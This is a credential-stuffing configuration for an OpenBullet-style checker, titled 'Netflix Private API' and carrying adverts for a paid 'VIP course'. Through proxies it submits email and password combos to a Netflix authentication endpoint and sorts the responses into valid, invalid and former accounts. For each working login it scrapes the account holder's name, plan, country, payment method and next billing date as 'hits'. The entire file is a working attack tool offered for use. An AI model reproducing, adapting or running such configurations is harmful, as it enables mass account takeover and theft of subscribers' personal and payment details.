[SETTINGS]
{
  "Name": "Netflix Private API",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2023-12-02T04:39:22.671978+06:00",
  "AdditionalInfo": "THANK YOU FOR JOINING OUR COURSE",
  "RequiredPlugins": [],
  "Author": "@MulaBhai",
  "Version": "1.1.4 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "Default",
  "AllowedWordlist2": "",
  "DataRules": [
    {
      "SliceName": "PASS",
      "RuleType": 2,
      "RuleString": "6",
      "Id": 1237294397
    }
  ],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Netflix Private API",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": "GOLDEN DRAGON COURSE",
  "Message": "JOIN OUR VIP COURSE FOR MORE!!!",
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#1 REQUEST GET "https://www.netflix.com/bd/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#2 REQUEST POST "https://android.nccp.us-east-1.prod.http1.netflix.com/account/auth" 
  CONTENT "email=<USER>&password=<PASS>&setCookies=true" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Referer: https://www.netflix.com/Login" 

#3 KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "NetflixId\":null,\"user\":{\"" 
    KEY "Incorrect email address or password" 
    KEY "Missing password" 
    KEY "membershipStatus\":\"ANONYMOUS" 
  KEYCHAIN Ban OR 
    KEY "Invalid Request" 
  KEYCHAIN Success OR 
    KEY "CURRENT_MEMBER" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "FORMER_MEMBER" 

SET USEPROXY FALSE    

#5 REQUEST GET "https://www.netflix.com/YourAccount" 
  
  COOKIE "flwssn: <flwssn>" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: www.netflix.com" 
  HEADER "Referer: https://www.netflix.com/browse" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: <THEXIFY>" 

#6 PARSE "<SOURCE>" LR "\"accountOwnerName\":\"" "\"," CreateEmpty=FALSE -> CAP "Name" 

#7 PARSE "<SOURCE>" LR "data-uia=\"plan-label\"><b>" "</b>" CreateEmpty=FALSE -> CAP "Plan" 

#8 PARSE "<SOURCE>" LR "\"videoQuality\":{\"fieldType\":\"String\",\"value\":\"" "\"" CreateEmpty=FALSE -> CAP "Video Quality" 

#9 PARSE "<SOURCE>" LR "\"countryOfSignup\":\"" "\"" CreateEmpty=FALSE -> CAP "Country" 

#10 PARSE "<SOURCE>" LR "\"country\":\"" "\"" CreateEmpty=FALSE -> CAP "Proxy Country" 

#11 PARSE "<SOURCE>" LR "\"memberSince\":\"" "\"" CreateEmpty=FALSE -> CAP "Member Since" 

#12 PARSE "<SOURCE>" LR "paymentMethod\":{\"fieldType\":\"String\",\"value\":\"" "\"}" CreateEmpty=FALSE -> CAP "Payment" 

#13 PARSE "<SOURCE>" LR "data-uia=\"nextBillingDate-item\">Your next billing date is " "<" -> CAP "Next Billing" 

